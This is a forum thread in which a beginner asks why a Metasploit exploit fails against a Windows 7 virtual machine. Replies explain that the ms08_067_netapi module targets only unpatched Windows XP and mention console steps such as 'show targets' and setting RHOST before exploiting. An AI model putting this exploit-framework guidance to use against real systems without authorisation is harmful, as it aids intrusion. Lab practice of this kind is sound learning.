Metasploit Help - Exploit failed [no-target]: No matching target? - Saint - Sep 28, 2013 I am testing out Metasploit by trying to hack my virtual machine (VMware Player) but when I try to do it, it doesn't work, it gives me an error "Exploit failed [no-target]: No matching target". Also when I try to hack myself by putting my ip in for the LHOST and the RHOST it gives me the same message. I am using Windows 7 Home premium and I was trying to hack Windows 7 Home premium on my virtual machine. Can someone help me out? No, I'm not retarded, I'm just new to this stuff, I'd appreciate it if you watch your mouth. 😠 And thanks to Sykosiz. * - PinkPanther - Sep 28, 2013 OP, there currently aren't any good exploits for windows 7 that provide a remote shell. You'll have to be creative. * - papaki - Sep 28, 2013 type "show targets" and you will se what you can exploit with this exploit * - _Silky - Sep 28, 2013 For one, only unpatched WinXP are vulnerable to the netapi08 exploit, Microsoft released that patch in 2008. Windows 7 doesn't have a similar exploit. Type in "show exploit" and look for another... there's hundreds of them.. but you can't to send an exploit and expect it to work, you have to find a vulnerability. And like @papaki said, type "show targets" and you'll see options for different versions of windows packs and etc. * - SIM-1980240 - Sep 28, 2013 Try some exploits on a xp system. Those exploits are patched a long time ago. xD * - DrDinosaur - Sep 28, 2013 Aw man, this is brutal. Where ever you have been learning this, turn away. Now. * - ananse0 - Dec 22, 2013 Wake up from your slumber. u r running to fast. * - wubulaien - Dec 22, 2013 by the way: for the ms08_067_netapi you do not have to set a payload. only set RHOST and then exploit the target. * - aEthern0 - Aug 2, 2015 HI Everyone same problem, but with XP instead of Windows Seven, also i have disactivated the Firewall! I'have Kali linux and on it installed via VirtualBox Windows Xp. Cheers * - Josch - Aug 2, 2015 @OP the exploit you're trying to use is for an old XP vulnerability, it's not going to work on Windows 7 or even an updated XP pc, that's why you get no matching target. Here's Microsoft's info about the vulnerability, including affected versions: https://technet.microsoft.com/en-us/library/security/ms08-067.aspx * - hahdbwoannniabs - Aug 2, 2015 (Aug 2, 2015 08:53 AM)Josch Wrote: @OP the exploit you're trying to use is for an old XP vulnerability, it's not going to work on Windows 7 or even an updated XP pc, that's why you get no matching target.
